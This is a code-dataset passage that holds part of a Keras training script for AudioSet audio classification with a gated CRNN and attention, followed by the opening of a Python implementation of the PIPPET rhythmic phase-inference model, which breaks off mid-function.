Activation('linear')(cnn1)\n cnn2 = Activation('sigmoid')(cnn2)\n\n out = Multiply()([cnn1, cnn2])\n return out\n\ndef slice1(x):\n return x[:, :, :, 0:64]\n\ndef slice2(x):\n return x[:, :, :, 64:128]\n\ndef slice1_output_shape(input_shape):\n return tuple([input_shape[0],input_shape[1],input_shape[2],64])\n\ndef slice2_output_shape(input_shape):\n return tuple([input_shape[0],input_shape[1],input_shape[2],64])\n\n# Attention weighted sum\ndef outfunc(vects):\n cla, att = vects # (N, n_time, n_out), (N, n_time, n_out)\n att = K.clip(att, 1e-7, 1.)\n out = K.sum(cla * att, axis=1) / K.sum(att, axis=1) # (N, n_out)\n return out\n\n# Train model\ndef train(args):\n data_dir = args.data_dir\n workspace = args.workspace\n balance_type = args.balance_type\n filename = args.filename\n model_type = args.model_type\n\n # Output directories\n sub_dir = os.path.join(filename,\n 'balance_type={}'.format(balance_type),\n 'model_type={}'.format(model_type),\n 'sr={}'.format(vp.feature_sr))\n\n models_dir = os.path.join(workspace, \"models\", sub_dir)\n utilities.create_folder(models_dir)\n\n stats_dir = os.path.join(workspace, \"stats\", sub_dir)\n utilities.create_folder(stats_dir)\n\n probs_dir = os.path.join(workspace, \"probs\", sub_dir)\n utilities.create_folder(probs_dir)\n\n # \n num_classes = vp.TOTAL_NUM_CLASS\n batch_size = vp.BATCH_SIZE\n\n df = pd.read_csv(vp.FILE_CLASS_LABELS)\n labels_dict = {}\n labels_dict['name'] = np.array(df[df['transfer'] == 1]['display_name'])\n labels_dict['id'] = np.array(df[df['transfer'] == 1]['index'])\n labels_dict['count'] = []\n\n # Load training & testing data\n # (tr_x, tr_y, tr_na_list) = load_hdf5_data(args.tr_hdf5_path, verbose=1)\n # (te_x, te_y, te_na_list) = load_hdf5_data(args.te_hdf5_path, verbose=1)\n # print(\"tr_x.shape: %s\" % (tr_x.shape,))\n\n # # Scale data\n # tr_x = do_scale(tr_x, args.scaler_path, verbose=1)\n # te_x = do_scale(te_x, args.scaler_path, verbose=1)\n # (_, n_time, n_freq) = tr_x.shape # (N, 240, 64)\n\n # Load testing data\n (test_x, test_y) = load_test_data(data_dir, labels_dict)\n\n # Build model\n\n # Data generator\n gen = QueueDataGenerator(batch_size=batch_size, type='train')\n batch_x, _ = next(gen.generate())\n (_, n_time, n_freq) = batch_x.shape # model change dynamically\n print('n_time ', n_time, 'n_freq ', n_freq)\n\n input_logmel = Input(shape=(n_time, n_freq), 
name='in_layer') # (N, 240, 64)\n print(input_logmel)\n\n a1 = Reshape((n_time, n_freq, 1))(input_logmel) # (N, 240, 64, 1)\n \n a1 = block(a1)\n a1 = block(a1)\n a1 = MaxPooling2D(pool_size=(1, 2))(a1) # (N, 240, 32, 128)\n \n a1 = block(a1)\n a1 = block(a1)\n a1 = MaxPooling2D(pool_size=(1, 2))(a1) # (N, 240, 16, 128)\n \n a1 = block(a1)\n a1 = block(a1)\n a1 = MaxPooling2D(pool_size=(1, 2))(a1) # (N, 240, 8, 128)\n \n a1 = block(a1)\n a1 = block(a1)\n a1 = MaxPooling2D(pool_size=(1, 2))(a1) # (N, 240, 4, 128)\n \n a1 = Conv2D(256, (3, 3), padding=\"same\", activation=\"relu\", use_bias=True)(a1)\n a1 = MaxPooling2D(pool_size=(1, 4))(a1) # (N, 240, 1, 256)\n \n a1 = Reshape((n_time, 256))(a1) # (N, 240, 256) bugfix: replace n_time for 240\n \n # Gated BGRU\n rnnout = Bidirectional(GRU(128, activation='linear', return_sequences=True))(a1)\n rnnout_gate = Bidirectional(GRU(128, activation='sigmoid', return_sequences=True))(a1)\n a2 = Multiply()([rnnout, rnnout_gate])\n \n # Attention\n cla = TimeDistributed(Dense(num_classes, activation='sigmoid'), name='localization_layer')(a2)\n att = TimeDistributed(Dense(num_classes, activation='softmax'))(a2)\n out = Lambda(outfunc, output_shape=(num_classes,))([cla, att])\n\n model = Model(input_logmel, out)\n\n # del model\n # load h5 model\n # save_out_path = os.path.join(\n # models_dir, \"md_{}_iters.h5\".format(18000))\n # model = load_model(save_out_path)\n\n # load json and create model\n # save_out_path = os.path.join(\n # models_dir, \"model.{}\".format(1500))\n # json_file = open(save_out_path + '.json', 'r')\n # loaded_model_json = json_file.read()\n # json_file.close()\n # model = model_from_json(loaded_model_json)\n # model.load_weights(save_out_path + '.weights.h5') # load weights into new model\n # print(\"Loaded model from disk\")\n\n model.summary()\n\n # Compile model\n # optimizer = Adam(lr=1e-3)\n model.compile(loss='binary_crossentropy', optimizer='adam')\n\n iteration = 0\n call_freq = 500\n train_time = time.time()\n\n for (batch_x, batch_y) in gen.generate():\n\n # Compute stats every several interations\n if (iteration % call_freq == 0) and (iteration != 0):\n\n logging.info(\"------------------\")\n\n logging.info(\n \"Iteration: {}, train time: {:.3f} s\".format(\n iteration, time.time() - train_time))\n\n # logging.info(\"Balance train statistics:\")\n # evaluate(\n # model=model,\n # input=bal_train_x,\n # target=bal_train_y,\n # stats_dir=os.path.join(stats_dir, 'bal_train'),\n # probs_dir=os.path.join(probs_dir, 'bal_train'),\n # iteration=iteration)\n\n logging.info(\"Test statistics:\")\n mAP, _, AP = evaluate(\n model=model,\n input=test_x,\n target=test_y,\n stats_dir=os.path.join(stats_dir, \"test\"),\n probs_dir=os.path.join(probs_dir, \"test\"),\n iteration=iteration,\n labels_map=labels_dict['id'])\n\n labels_dict['AP'] = AP\n for (name, ap) in zip(labels_dict['name'], labels_dict['AP']):\n print(name, '\\t', ap) \n train_time = time.time()\n\n # Update params\n # (batch_x, batch_y) = utilities.transform_data(batch_x, batch_y) !!!!\n cost = model.train_on_batch(x=batch_x, y=batch_y)\n if (iteration % 10) == 0:\n print(iteration,':', cost)\n\n iteration += 1\n \n # Save model\n if (iteration % 500) == 0:\n # save_out_path = os.path.join(\n # models_dir, \"md_{}_iters.h5\".format(iteration))\n # model.save(save_out_path)\n\n # serialize model to JSON\n save_out_path = os.path.join(\n models_dir, \"model.{}\".format(iteration))\n model_json = model.to_json()\n with open(save_out_path + '.json', \"w\") as 
json_file:\n json_file.write(model_json)\n # serialize weights to HDF5\n model.save_weights(save_out_path + '.weights.h5')\n print(\"Saved model to disk\")\n\n # Stop training when maximum iteration achieves\n if iteration == 50001:\n break\n\n # def as_keras_metric(method):\n # import functools\n # from keras import backend as K\n # import tensorflow as tf\n # @functools.wraps(method)\n # def wrapper(self, args, **kwargs):\n # \"\"\" Wrapper for turning tensorflow metrics into keras metrics \"\"\"\n # value, update_op = method(self, args, **kwargs)\n # K.get_session().run(tf.local_variables_initializer())\n # with tf.control_dependencies([update_op]):\n # value = tf.identity(value)\n # return value\n # return wrapper\n\n # precision = as_keras_metric(tf.metrics.precision)\n # recall = as_keras_metric(tf.metrics.recall)\n \n # @as_keras_metric\n # def auc_pr(y_true, y_pred, curve='PR'):\n # return tf.metrics.auc(y_true, y_pred, curve=curve)\n\n # @as_keras_metric\n # def mAP(y_true, y_pred):\n # _, m_ap = tf.metrics.average_precision_at_k(y_true, y_pred, 5)\n # return m_ap\n\n # return metrics.average_precision_score(y_true, y_pred, average=None)\n # _, m_ap = tf.metrics.average_precision_at_k(y_true, y_pred, k) k= 5 # return m_ap\n\n # metrics=['accuracy', precision, recall, auc_pr]) # 'accuracy', mAP\n # metrics=['accuracy', mAP]) # 'accuracy', mAP\n\n # Save model callback\n # filepath = os.path.join('/work/audio/audioset_classification/work/models', \n # \"gatedAct_rationBal44_lr0.001_normalization_at_cnnRNN_64newMel_240fr.{epoch:02d}-{val_acc:.4f}.hdf5\")\n # create_folder(os.path.dirname(filepath))\n # save_model = ModelCheckpoint(filepath=filepath,\n # monitor='val_acc', \n # verbose=0,\n # save_best_only=False,\n # save_weights_only=False,\n # mode='auto',\n # period=1) # each epoch??? 
\n\n # Data generator\n # gen = RatioDataGenerator(batch_size=44, type='train')\n\n # Train\n # model.fit_generator(generator=gen.generate(), \n # steps_per_epoch=500, # iters is called an 'epoch', old val: 100\n # epochs=101, # Maximum 'epoch' to train, old val: 31\n # verbose=1, \n # callbacks=[save_model], \n # validation_data=(te_x, te_y))\n\ndef load_test_data(data_dir, labels_dict):\n labels_map_mask = [False] * vp.TOTAL_NUM_CLASS\n for x in labels_dict['id']:\n labels_map_mask[x] = True\n\n # Load data\n load_time = time.time()\n\n # train_x = []\n # train_y = []\n # train_id_list = []\n test_x = []\n test_y = []\n test_id_list = []\n\n # early_stop = 0\n for aclass in labels_dict['name']:\n print(aclass)\n\n # local_train_x = []\n # local_train_y = []\n # local_train_id_list = []\n local_test_x = []\n local_test_y = []\n local_test_id_list = []\n\n # # Path of hdf5 data\n # bal_train_hdf5_path = os.path.join(data_dir, aclass, \"balanced_train_segments.hdf5\")\n # unbal_train_hdf5_path = os.path.join(data_dir, aclass, \"unbalanced_train_segments.hdf5\")\n test_hdf5_path = os.path.join(data_dir, aclass, \"eval_segments.hdf5\")\n\n # if mini_data:\n # # Only load balanced data\n # (bal_train_x, bal_train_y, bal_train_id_list) = utilities.load_data(\n # bal_train_hdf5_path)\n\n # local_train_x = bal_train_x\n # local_train_y = bal_train_y\n # local_train_id_list = bal_train_id_list\n\n # else:\n # # Load both balanced and unbalanced data\n # (bal_train_x, bal_train_y, bal_train_id_list) = utilities.load_data(\n # bal_train_hdf5_path)\n\n # (unbal_train_x, unbal_train_y, unbal_train_id_list) = utilities.load_data(\n # unbal_train_hdf5_path)\n\n # local_train_x = np.concatenate((bal_train_x, unbal_train_x))\n # local_train_y = np.concatenate((bal_train_y, unbal_train_y))\n # local_train_id_list = bal_train_id_list + unbal_train_id_list\n\n # labels_dict['count'].append(len(local_train_id_list))\n # Test data\n (local_test_x, local_test_y, local_test_id_list) = utilities.load_data(test_hdf5_path)\n print('local_test: ', local_test_x.shape, local_test_y.shape)\n\n # train_x = ( local_train_x if (train_x == []) else np.concatenate((train_x, local_train_x)) )\n # train_y = ( local_train_y if (train_y == []) else np.concatenate((train_y, local_train_y)) )\n # train_id_list = train_id_list + local_train_id_list\n test_x = ( local_test_x if (test_x == []) else np.concatenate((test_x, local_test_x)) )\n test_y = ( local_test_y if (test_y == []) else np.concatenate((test_y, local_test_y)) )\n test_id_list = test_id_list + local_test_id_list\n\n # # Mask other classes.\n # for ii, item in enumerate(train_y):\n # train_y[ii] = np.logical_and(item, labels_map_mask)\n for ii, item in enumerate(test_y):\n test_y[ii] = np.logical_and(item, labels_map_mask)\n\n for ii, item in enumerate(test_y):\n if not any(item):\n print(test_id_list[ii])\n print(ii, item)\n raise Exception('False item, no positive label.')\n\n test_x_mfcc, test_y_mfcc, test_seq_len = tasksmq.batch_wav_to_mfcc_parallel(test_x, test_y, agumentation=False) # test_seq_len = np.ones(len(test_x_mfcc)) * 240 # length array of the batch\n print(\"Loading data time: {:.3f} s\".format(time.time() - load_time))\n\n return test_x_mfcc, test_y_mfcc\n\n# Run function in mini-batch to save memory. 
\n# def run_func(func, x, batch_size):\n# pred_all = []\n# batch_num = int(np.ceil(len(x) / float(batch_size)))\n# for i1 in xrange(batch_num):\n# batch_x = x[batch_size * i1 : batch_size * (i1 + 1)]\n# [preds] = func([batch_x, 0.])\n# pred_all.append(preds)\n# pred_all = np.concatenate(pred_all, axis=0)\n# return pred_all\n\n# # Recognize and write probabilites. \n# def recognize(args, at_bool, sed_bool):\n# (te_x, te_y, te_na_list) = load_hdf5_data(args.te_hdf5_path, verbose=1)\n# x = te_x\n# y = te_y\n# na_list = te_na_list\n \n# x = do_scale(x, args.scaler_path, verbose=1)\n \n# fusion_at_list = []\n# fusion_sed_list = []\n# for epoch in range(20, 30, 1):\n# t1 = time.time()\n# [model_path] = glob.glob(os.path.join(args.model_dir, \n# \"*.%02d-0.*.hdf5\" % epoch))\n# model = load_model(model_path)\n \n# # Audio tagging\n# if at_bool:\n# pred = model.predict(x)\n# fusion_at_list.append(pred)\n \n# # Sound event detection\n# if sed_bool:\n# in_layer = model.get_layer('in_layer')\n# loc_layer = model.get_layer('localization_layer')\n# func = K.function([in_layer.input, K.learning_phase()], \n# [loc_layer.output])\n# pred3d = run_func(func, x, batch_size=20)\n# fusion_sed_list.append(pred3d)\n \n# print(\"Prediction time: %s\" % (time.time() - t1,))\n \n# # Write out AT probabilities\n# if at_bool:\n# fusion_at = np.mean(np.array(fusion_at_list), axis=0)\n# print(\"AT shape: %s\" % (fusion_at.shape,))\n# io_task4.at_write_prob_mat_to_csv(\n# na_list=na_list, \n# prob_mat=fusion_at, \n# out_path=os.path.join(args.out_dir, \"at_prob_mat.csv.gz\"))\n \n# # Write out SED probabilites\n# if sed_bool:\n# fusion_sed = np.mean(np.array(fusion_sed_list), axis=0)\n# print(\"SED shape:%s\" % (fusion_sed.shape,))\n# io_task4.sed_write_prob_mat_list_to_csv(\n# na_list=na_list, \n# prob_mat_list=fusion_sed, \n# out_path=os.path.join(args.out_dir, \"sed_prob_mat_list.csv.gz\"))\n \n# print(\"Prediction finished!\")\n\n# # Get stats from probabilites. 
\n# def get_stat(args, at_bool, sed_bool):\n# lbs = cfg.lbs\n# step_time_in_sec = cfg.step_time_in_sec\n# max_len = cfg.max_len\n# thres_ary = [0.3] * len(lbs)\n\n# # Calculate AT stat\n# if at_bool:\n# pd_prob_mat_csv_path = os.path.join(args.pred_dir, \"at_prob_mat.csv.gz\")\n# at_stat_path = os.path.join(args.stat_dir, \"at_stat.csv\")\n# at_submission_path = os.path.join(args.submission_dir, \"at_submission.csv\")\n \n# at_evaluator = evaluate.AudioTaggingEvaluate(\n# weak_gt_csv=\"meta_data/groundtruth_weak_label_testing_set.csv\", \n# lbs=lbs)\n \n# at_stat = at_evaluator.get_stats_from_prob_mat_csv(\n# pd_prob_mat_csv=pd_prob_mat_csv_path, \n# thres_ary=thres_ary)\n \n# # Write out & print AT stat\n# at_evaluator.write_stat_to_csv(stat=at_stat, \n# stat_path=at_stat_path)\n# at_evaluator.print_stat(stat_path=at_stat_path)\n \n# # Write AT to submission format\n# io_task4.at_write_prob_mat_csv_to_submission_csv(\n# at_prob_mat_path=pd_prob_mat_csv_path, \n# lbs=lbs, \n# thres_ary=at_stat['thres_ary'], \n# out_path=at_submission_path)\n \n# # Calculate SED stat\n# if sed_bool:\n# sed_prob_mat_list_path = os.path.join(args.pred_dir, \"sed_prob_mat_list.csv.gz\")\n# sed_stat_path = os.path.join(args.stat_dir, \"sed_stat.csv\")\n# sed_submission_path = os.path.join(args.submission_dir, \"sed_submission.csv\")\n \n# sed_evaluator = evaluate.SoundEventDetectionEvaluate(\n# strong_gt_csv=\"meta_data/groundtruth_strong_label_testing_set.csv\", \n# lbs=lbs, \n# step_sec=step_time_in_sec, \n# max_len=max_len)\n \n# # Write out & print SED stat\n# sed_stat = sed_evaluator.get_stats_from_prob_mat_list_csv(\n# pd_prob_mat_list_csv=sed_prob_mat_list_path, \n# thres_ary=thres_ary)\n \n# # Write SED to submission format\n# sed_evaluator.write_stat_to_csv(stat=sed_stat, \n# stat_path=sed_stat_path) \n# sed_evaluator.print_stat(stat_path=sed_stat_path)\n \n# # Write SED to submission format\n# io_task4.sed_write_prob_mat_list_csv_to_submission_csv(\n# sed_prob_mat_list_path=sed_prob_mat_list_path, \n# lbs=lbs, \n# thres_ary=thres_ary, \n# step_sec=step_time_in_sec, \n# out_path=sed_submission_path)\n \n# print(\"Calculating stat finished!\")\n\nif __name__ == '__main__':\n # parser = argparse.ArgumentParser(description=\"\")\n # subparsers = parser.add_subparsers(dest='mode')\n \n # parser_train = subparsers.add_parser('train')\n # parser_train.add_argument('--tr_hdf5_path', type=str)\n # parser_train.add_argument('--te_hdf5_path', type=str)\n # parser_train.add_argument('--scaler_path', type=str)\n # parser_train.add_argument('--out_model_dir', type=str)\n \n # parser_recognize = subparsers.add_parser('recognize')\n # parser_recognize.add_argument('--te_hdf5_path', type=str)\n # parser_recognize.add_argument('--scaler_path', type=str)\n # parser_recognize.add_argument('--model_dir', type=str)\n # parser_recognize.add_argument('--out_dir', type=str)\n \n # parser_get_stat = subparsers.add_parser('get_stat')\n # parser_get_stat.add_argument('--pred_dir', type=str)\n # parser_get_stat.add_argument('--stat_dir', type=str)\n # parser_get_stat.add_argument('--submission_dir', type=str)\n \n # args = parser.parse_args()\n \n # if args.mode == 'train':\n # train(args)\n # elif args.mode == 'recognize':\n # recognize(args, at_bool=True, sed_bool=True)\n # elif args.mode == 'get_stat':\n # get_stat(args, at_bool=True, sed_bool=True)\n # else:\n # raise Exception(\"Incorrect argument!\")\n\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument('--workspace', type=str, required=True)\n # 
parser.add_argument('--data_dir', type=str, required=True)\n\n parser.add_argument('--balance_type', type=str,\n default='balance_in_batch',\n choices=['no_balance', 'balance_in_batch'])\n\n parser.add_argument('--model_type', type=str, required=True,\n choices=['crnn_sed', \n 'decision_level_average_pooling', \n 'decision_level_single_attention',\n 'decision_level_multi_attention',\n 'feature_level_attention'])\n\n subparsers = parser.add_subparsers(dest='mode')\n parser_train = subparsers.add_parser('train')\n\n args = parser.parse_args()\n args.filename = utilities.get_filename(__file__)\n args.data_dir = vp.DATA_DIR\n if args.mode == 'train':\n train(args)\n","repo_name":"quentin-wang/audioset_classification","sub_path":"keras/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":25185,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"32149034019","text":"'''\nPIPPET: Phase Inference from Point Process Event Timing [1]\n + mPIPPET: multiple event streams [1]\n + pPIPPET: pattern inference [2]\n + oscPIPPET: oscillatory PIPPET\n\nPython variant of Jonathan Cannon's original MATLAB implementation:\n https://github.com/joncannon/PIPPET\n\n\nTODO:\n- Gradients for pPIPPET\n- Refactor for mpPIPPET, multi-stream per template\n\n[1] Expectancy-based rhythmic entrainment as continuous Bayesian inference.\n Cannon J (2021) PLOS Computational Biology 17(6): e1009025.\n[2] Modeling enculturated bias in entrainment to rhythmic patterns.\n Kaplan T, Cannon J, Jamone L & Pearce M (2021) - In Review.\n\n@Tom Kaplan: t.m.kaplan@qmul.ac.uk\n'''\nfrom __future__ import annotations\nimport numpy as np\nfrom abc import ABC, abstractmethod\nfrom collections import defaultdict\nfrom dataclasses import dataclass, field\nfrom scipy.stats import norm\n\nTWO_PI = 2 * np.pi\n\n@dataclass(init=True, repr=True)\nclass TemplateParams:\n ''' Expectation template and respective (stimulus) event timing '''\n e_times: np.ndarray # Observed event times\n e_means: np.ndarray # Expected event times (mean phase)\n e_vars: np.ndarray # Variance of expected event times\n e_lambdas: np.ndarray # Strength of expected event times\n label: str # Identifier/label for analysis\n\n def reset(self, means: np.ndarray, vars_: np.ndarray, lambdas: np.ndarray) -> None:\n self.e_means = means\n self.e_vars = vars_\n self.e_lambdas = lambdas\n\n@dataclass(init=True, repr=True)\nclass PIPPETParams:\n ''' Configuration for PIPPET model - parameters and expectation templates '''\n templates: list = field(default_factory=list)\n\n lambda_0: float = 0.01 # Background event expectation strength\n mu_0: float = 0.0 # Initial estimated phase\n V_0: float = 0.0002 # Initial variance\n sigma_phi: float = 0.05 # Generative model phase noise\n\n eta_mu: float = 0.0 # Internal phase noise\n eta_V: float = 0.0 # Internal variance noise\n eta_e: float = 0.0 # Internal event noise\n eta_e_share: bool = False # Shared event noise across templates (for pPIPPET, set True)\n\n dt: float = 0.001 # Integration time step\n overtime: float = 0.0 # Time buffer for simulation\n t0: float = 0.0 # Starting time for simulation with respect to event times\n tmax: float = np.nan # Maximum time for simulation (otherwise based on event times)\n\n tau: float = 1.0 # Tempo-like dial for oscPIPPET\n\n def add(self, times: np.ndarray, means: np.ndarray, vars_: np.ndarray, lambdas: np.ndarray,\n label: str) -> None:\n ''' Add an expectation template, which corresponds to either:\n (1) a unique event 
stream for mPIPPET,\n (2) a separate expectation template for pPIPPET\n '''\n self.templates.append(TemplateParams(times, means, vars_, lambdas, label))\n\nclass PIPPETStream:\n ''' Variational filtering equations for PIPPET, see Methods of [1] or [2] '''\n\n def __init__(self, params: TemplateParams, lambda_0: float):\n self.params = params\n self.lambda_0 = lambda_0\n self.e_times_p = params.e_times\n # For oscPIPPET:\n self.M = np.arange(-40, 40+1, 1)\n self.cs = np.empty((self.params.e_means.size, self.M.size), dtype=np.clongdouble)\n self.e_means_ = self.params.e_means.reshape(-1, 1)\n self.e_vars_ = self.params.e_vars.reshape(-1, 1)\n\n @staticmethod\n def z_mu_V(z: complex) -> tuple[float,float]:\n return np.angle(z), -2*np.log(np.abs(z))\n\n def mu_i(self, mu: float, V: float) -> float:\n return (mu/V + self.params.e_means/self.params.e_vars)/(1/V + 1/self.params.e_vars)\n\n def K_i(self, V: float) -> float:\n return 1/(1/V + 1/self.params.e_vars)\n\n def lambda_i(self, mu: float, V: float) -> float:\n gauss = norm.pdf(mu, loc=self.params.e_means, scale=(self.params.e_vars + V)**0.5)\n return self.params.e_lambdas * gauss\n\n def lambda_hat(self, mu: float, V:float) -> float:\n return self.lambda_0 + np.sum(self.lambda_i(mu, V))\n\n def mu_hat(self, mu: float, V: float) -> float:\n mu_hat = self.lambda_0 * mu\n mu_hat += np.sum(self.lambda_i(mu, V) * self.mu_i(mu, V))\n return mu_hat / self.lambda_hat(mu, V)\n\n def V_hat(self, mu_curr: float, mu_prev: float, V: float) -> float:\n V_hat = self.lambda_0 * (V + (mu_prev-mu_curr)**2)\n a = self.lambda_i(mu_prev, V)\n b = self.K_i(V) + (self.mu_i(mu_prev, V)-mu_curr)**2\n V_hat += np.sum(a * b)\n return V_hat / self.lambda_hat(mu_prev, V)\n\n def zlambda(self, mu: float, V: float, tau: float) -> float:\n self.cs.real = -(self.M**2) * ((V+self.params.e_vars)/2).reshape(-1, 1)\n self.cs.imag = -self.M*(mu - self.params.e_means).reshape(-1, 1)\n y = np.sum(self.params.e_lambdas*tau/TWO_PI * np.exp(self.cs).real.sum(axis=1))\n return self.lambda_0*tau/TWO_PI + y\n\n def z_hat(self, mu: float, V: float, blambda: float, tau: float) -> complex:\n self.cs.real = -(V*self.M**2)/2 - (self.e_vars_ * (self.M + 1)**2)/2\n self.cs.imag = -self.M*(mu - self.params.e_means).reshape(-1, 1) + self.e_means_\n z_hat_i = self.params.e_lambdas*tau/TWO_PI * np.exp(self.cs).sum(axis=1)\n y = self.lambda_0*tau/TWO_PI * np.exp(complex(-V/2, mu)) + np.sum(z_hat_i)\n return 1/blambda * y\n\nclass PIPPET(ABC):\n ''' Base class for PIPPET inference problems '''\n\n def __init__(self, params: PIPPETParams):\n self.params = params\n # Create unique streams/patterns for (mp)PIPPET filtering, based on params\n self.streams = []\n self.labels = []\n for p in params.templates:\n self.streams.append(PIPPETStream(p, params.lambda_0))\n self.labels.append(p.label)\n self.n_streams = len(self.streams)\n self.event_n = np.zeros(self.n_streams).astype(int)\n\n # Pre-compute shared internal noise, if appropriate\n if params.eta_e_share:\n noise = np.random.randn(*self.streams[0].e_times_p.shape) * self.params.eta_e\n for s_i in range(self.n_streams):\n self.streams[s_i].e_times_p += noise\n else:\n for s_i in range(self.n_streams):\n noise = np.random.randn(*self.streams[s_i].e_times_p.shape) * self.params.eta_e\n self.streams[s_i].e_times_p += noise\n # Ensure events (perturbed by noise) don't occur at negative time\n for s_i in range(self.n_streams):\n self.streams[s_i].e_times_p[self.streams[s_i].e_times_p < 0] = 0.0\n\n # Timing of simulation\n self.tmax = params.tmax if 
~np.isnan(params.tmax) else max(s.e_times_p[-1] for s in self.streams)\n self.tmax += params.overtime\n self.ts = np.arange(self.params.t0, self.tmax+self.params.dt, step=self.params.dt)\n self.n_ts = self.ts.shape[0]\n # Initialise sufficient statistics\n self.mu_s = np.zeros(self.n_ts)\n self.mu_s[0] = self.params.mu_0\n self.V_s = np.zeros(self.n_ts)\n self.V_s[0] = self.params.V_0\n self.z_s = np.ones(self.n_ts, dtype=np.clongdouble)\n self.z_s[0] = np.exp(complex(-self.params.V_0/2, self.params.mu_0))\n self.idx_event = set()\n self.event_stream = defaultdict(set)\n # Gradient of Lambda\n self.grad = np.zeros((self.n_ts, self.n_streams))\n # Surprisal\n self.surp = np.zeros((self.n_ts, self.n_streams, 2))\n\n def is_onset(self, t_prev: float, t: float, s_i: int, stim: bool=True) -> bool:\n ''' Check whether an event is observed on this time-step '''\n evts = self.streams[s_i].e_times_p if stim else self.streams[s_i].params.e_means\n if self.event_n[s_i] < len(evts):\n return t_prev <= evts[self.event_n[s_i]] <= t\n return False\n\n def add_event(self, s_i: int, event_time: float) -> None:\n ''' Add a new event '''\n if self.streams[s_i].e_times_p.size > 0 and event_time < self.streams[s_i].e_times_p[-1]:\n raise ValueError('Existing observation time exceeds new event time')\n n_event = self.streams[s_i].e_times_p.size\n self.streams[s_i].e_times_p = np.insert(self.streams[s_i].e_times_p, n_event, event_time)\n\n @abstractmethod\n def step(self) -> tuple[float, float]:\n ''' Posterior update for a time step '''\n mu, V = None, None\n return mu, V\n\n @abstractmethod\n def run(self) -> None:\n ''' Simulation for entire stimulus (i.e. all time steps) '''\n for i in range(1, self.n_ts):\n pass # At least, this should call self.step()\n\n\nclass mPIPPET(PIPPET):\n ''' PIPPET with multiple event streams '''\n\n def step(self, t_i: int, mu_prev: float, V_prev: float) -> tuple[float, float]:\n ''' Posterior update for a time step '''\n\n # Internal phase noise\n noise = np.sqrt(self.params.dt) * self.params.eta_mu * np.random.randn()\n\n # Sum dmu across event streams\n dmu_sum = 0\n for s_i in range(self.n_streams):\n dmu = self.streams[s_i].lambda_hat(mu_prev, V_prev)\n dmu *= (self.streams[s_i].mu_hat(mu_prev, V_prev) - mu_prev)\n dmu_sum += dmu\n mu = mu_prev + self.params.dt*(1 - dmu_sum) + noise\n\n # Sum dV across event streams\n dV_sum = 0\n for s_i in range(self.n_streams):\n dV = self.streams[s_i].lambda_hat(mu_prev, V_prev)\n dV *= (self.streams[s_i].V_hat(mu, mu_prev, V_prev) - V_prev)\n dV_sum += dV\n V = V_prev + self.params.dt*(self.params.sigma_phi**2 - dV_sum)\n\n # Update posterior based on events in any stream\n t_prev, t = self.ts[t_i-1], self.ts[t_i]\n for s_i in range(self.n_streams):\n if self.is_onset(t_prev, t, s_i):\n mu_new = self.streams[s_i].mu_hat(mu, V)\n V = self.streams[s_i].V_hat(mu_new, mu, V)\n mu = mu_new\n self.event_n[s_i] += 1\n self.idx_event.add(t_i)\n self.event_stream[t_i].add(s_i)\n\n self.surp[t_i, s_i, 0] = -np.log(self.streams[s_i].lambda_hat(mu_prev, V_prev)*self.params.dt)\n self.surp[t_i, s_i, 1] = -np.log(self.streams[s_i].lambda_hat(mu, V)*self.params.dt)\n self.grad[t_i, s_i] = -np.log(self.streams[s_i].lambda_hat(mu_prev+.01, V_prev)*self.params.dt)\n self.grad[t_i, s_i] += np.log(self.streams[s_i].lambda_hat(mu_prev-.01, V_prev)*self.params.dt)\n self.grad[t_i, s_i] /= .02\n else:\n self.surp[t_i, s_i, 0] = -np.log(1-self.streams[s_i].lambda_hat(mu_prev, V_prev)*self.params.dt)\n self.surp[t_i, s_i, 1] = 
-np.log(1-self.streams[s_i].lambda_hat(mu, V)*self.params.dt)\n self.grad[t_i, s_i] = -np.log(1-self.streams[s_i].lambda_hat(mu_prev+.01, V_prev)*self.params.dt)\n self.grad[t_i, s_i] += np.log(1-self.streams[s_i].lambda_hat(mu_prev-.01, V_prev)*self.params.dt)\n self.grad[t_i, s_i] /= .02\n\n self.mu_s[t_i] = mu\n self.V_s[t_i] = V\n \n return mu, V\n\n def run(self) -> None:\n ''' Step through entire stimulus, tracking sufficient statistics '''\n for i in range(1, self.n_ts):\n mu_prev = self.mu_s[i-1]\n V_prev = self.V_s[i-1]\n _ = self.step(i, mu_prev, V_prev)\n\n\nclass pPIPPET(PIPPET):\n ''' PIPPET with pattern (i.e. template) inference '''\n\n def __init__(self, params: PIPPETParams, prior: np.ndarray):\n super().__init__(params)\n\n # Track likelihoods and big Lambdas per pattern\n self.n_m = self.n_streams\n self.L_s = np.zeros(self.n_ts)\n self.L_ms = np.zeros((self.n_ts, self.n_m))\n self.p_m = np.zeros((self.n_ts, self.n_m))\n self.p_m[0] = prior\n self.p_m[0] = self.p_m[0]/self.p_m[0].sum()\n\n # Initialise big Lambdas using mu_0 and V_0\n for s_i, m in enumerate(self.streams):\n self.L_ms[0, s_i] = m.lambda_hat(self.mu_s[0], self.V_s[0])\n self.L_s[0] = np.sum(self.p_m[0] * self.L_ms[0])\n\n def step_stream(self, s_i: int, mu_prev: float, V_prev: float, is_event: bool=False) -> tuple[float, float]:\n ''' Posterior step for a given pattern '''\n\n noise = np.sqrt(self.params.dt) * self.params.eta_mu * np.random.randn()\n\n dmu = self.streams[s_i].lambda_hat(mu_prev, V_prev)\n dmu *= (self.streams[s_i].mu_hat(mu_prev, V_prev) - mu_prev)\n mu = mu_prev + self.params.dt*(1 - dmu) + noise\n\n dV = self.streams[s_i].lambda_hat(mu_prev, V_prev)\n dV *= (self.streams[s_i].V_hat(mu, mu_prev, V_prev) - V_prev)\n V = V_prev + self.params.dt*(self.params.sigma_phi**2 - dV)\n\n if is_event:\n mu_new = self.streams[s_i].mu_hat(mu, V)\n V = self.streams[s_i].V_hat(mu_new, mu, V)\n mu = mu_new\n\n return mu, V\n\n def step(self, t_i: int, lambda_prev: float, mu_prev: float, V_prev: float) -> tuple[float, float]:\n mu_ms = np.zeros(self.n_m)\n V_ms = np.zeros(self.n_m)\n\n t_prev, t = self.ts[t_i-1], self.ts[t_i]\n\n # For each pattern\n for s_i in range(self.n_m):\n lambda_m_prev = self.L_ms[t_i-1, s_i]\n prev_p_m = self.p_m[t_i-1, s_i]\n\n # Update p_m based on event observations (or absence of them)\n is_event = self.is_onset(t_prev, t, s_i)\n d_p_m = prev_p_m * (lambda_m_prev/lambda_prev - 1)\n if not 